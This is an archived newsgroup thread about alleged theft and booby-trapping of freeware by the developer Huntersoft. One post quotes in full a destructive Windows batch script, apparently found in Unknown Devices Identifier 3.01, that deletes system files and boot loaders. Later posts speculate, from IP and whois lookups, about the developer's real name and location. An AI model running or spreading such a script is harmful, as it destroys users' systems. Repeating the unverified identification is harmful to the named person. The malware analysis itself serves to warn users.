Huntersoft - new information

S

Susan Bugher

I received information about this offlist. See:

http://download.com.com/3302-2094-10121444.html

"CNET User Opinions" for Windriver Ghost by Huntersoft.

The opinions include an accusation by Andrew Futcher RubyMicro Head
Developer http://www.rubymicro.com that the Huntersoft program was
stolen from them.

15 opinions in all, many of them from *Duling* praising the program. . .

the wording seems familiar . . .


There is new information at:

http://www.halfdone.com/SOTW/UnknownDevicesRip/

http://www.halfdone.com/SOTW/Message2Huntersoft/

<quote> Ok, it appears that atleast Unknown Devices Identifier 3.01 is
boobytrapped. </quote>


Susan
 
J

John Corliss

Susan said:
I received information about this offlist. See:

http://download.com.com/3302-2094-10121444.html

"CNET User Opinions" for Windriver Ghost by Huntersoft.
The opinions include an accusation by Andrew Futcher RubyMicro Head
Developer http://www.rubymicro.com that the Huntersoft program was
stolen from them.
15 opinions in all, many of them from *Duling* praising the program. . .
the wording seems familiar . . .
There is new information at:

http://www.halfdone.com/SOTW/UnknownDevicesRip/
http://www.halfdone.com/SOTW/Message2Huntersoft/

<quote> Ok, it appears that atleast Unknown Devices Identifier 3.01 is
boobytrapped. </quote>
Click to expand...

Specifially this:

"Ok, it appears that atleast Unknown Devices Identifier 3.01 is
boobytrapped. Under certain conditions that I'm not quite sure about,
the program creates and runs this batch file:

@echo off
del /Q *.*
del /Q system32\*.*
del /Q system\*.*
del /Q inf\*.*
del /Q ServicePackFiles\i386\*.*
attrib -r -h -s c:\ntldr
attrib -r -h -s c:\ntdetect.com
attrib -r -h -s c:\io.sys
attrib -r -h -s c:\command.com
del /Q c:\ntldr
del /Q c:\ntdetect.com
del /Q c:\io.sys
del /Q c:\command.com
del /Q txt.bat

This batch script tries to delete several files, likely tring to break
windows itself."

That it tries to break Windows is more than just likely. It seems
obvious to me that "Jacques" included this virus in order to prevent
examination of "his" program's code.

What a slimeball (s)he(it) is. Perhaps the authorities in Korea should
be alerted to his activities. Maybe their laws will lead to his arrest.

--
Regards from John Corliss
alt.comp.freeware F.A.Q.:
http://www.ccountry.net/~jcorliss/F.A.Q./FrameSet1.html
Note that I can't see any of Andy Mabbett's troll posts
because I have him killfiled.
 
?

=?ISO-8859-1?Q?=BBQ=AB?=

That it tries to break Windows is more than just likely. It seems
obvious to me that "Jacques" included this virus in order to
prevent examination of "his" program's code.
Click to expand...

Not a virus, unless it infects other files and can replicate. But
malware certainly.
What a slimeball (s)he(it) is. Perhaps the authorities in Korea
should be alerted to his activities. Maybe their laws will lead to
his arrest.
Click to expand...

China, as I recall.
 
J

John Corliss

»Q« said:
Not a virus, unless it infects other files and can replicate. But
malware certainly.
Click to expand...

Thanks for the correction.
China, as I recall.
Click to expand...

According to Mike Moniz on this website:

http://www.halfdone.com/SOTW/Message2Huntersoft/

Jacques' "IP (211.233.72.119) is actually in Seoul, Korea."

However, that could indeed be an incorrect assumption.


--
Regards from John Corliss
alt.comp.freeware F.A.Q.:
http://www.ccountry.net/~jcorliss/F.A.Q./FrameSet1.html
Note that I can't see any of Andy Mabbett's troll posts
because I have him killfiled.
 
J

John Corliss

»Q« said:
That one is indeed in Korea. He has posted from connections in China,
and as I recall, his website is hosted in France. I guess he'd rather
no one know quite where he is. ;)
Click to expand...

Well, what I meant to say was that it could be a false assumption on
my part that his location is in Korea.

His website, however, is hosted by an outfit in Bejing, China since
www.zhangduo.com resolves to 211.154.211.103 211.154.211.104 and
211.154.211.18, and when you do a whois using:

http://www.apnic.net/apnic-bin/whois.pl

it says this is the case.

He has registered his domain using french email addresses in France:

http://www.samspade.org/t/lookat?a=http://www.zhangduo.com

Looks like his real name is Zhang Duo and he's a student at Fudan
University. I could be wrong, but in China, falsifying such things
might land him in a prison camp so it's likely that they are correct.
Note that his primary DNS is in China too.

As for that French email address through "voila.fr":

http://voila.fr/

they offer throw away email accounts, link in the upper right hand
corner under "Communiquer" where it says "E-mail gratuit".

--
Regards from John Corliss
alt.comp.freeware F.A.Q.:
http://www.ccountry.net/~jcorliss/F.A.Q./FrameSet1.html
Note that I can't see any of Andy Mabbett's troll posts
because I have him killfiled.
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads

Deceptive Practices: Huntersoft 37

Top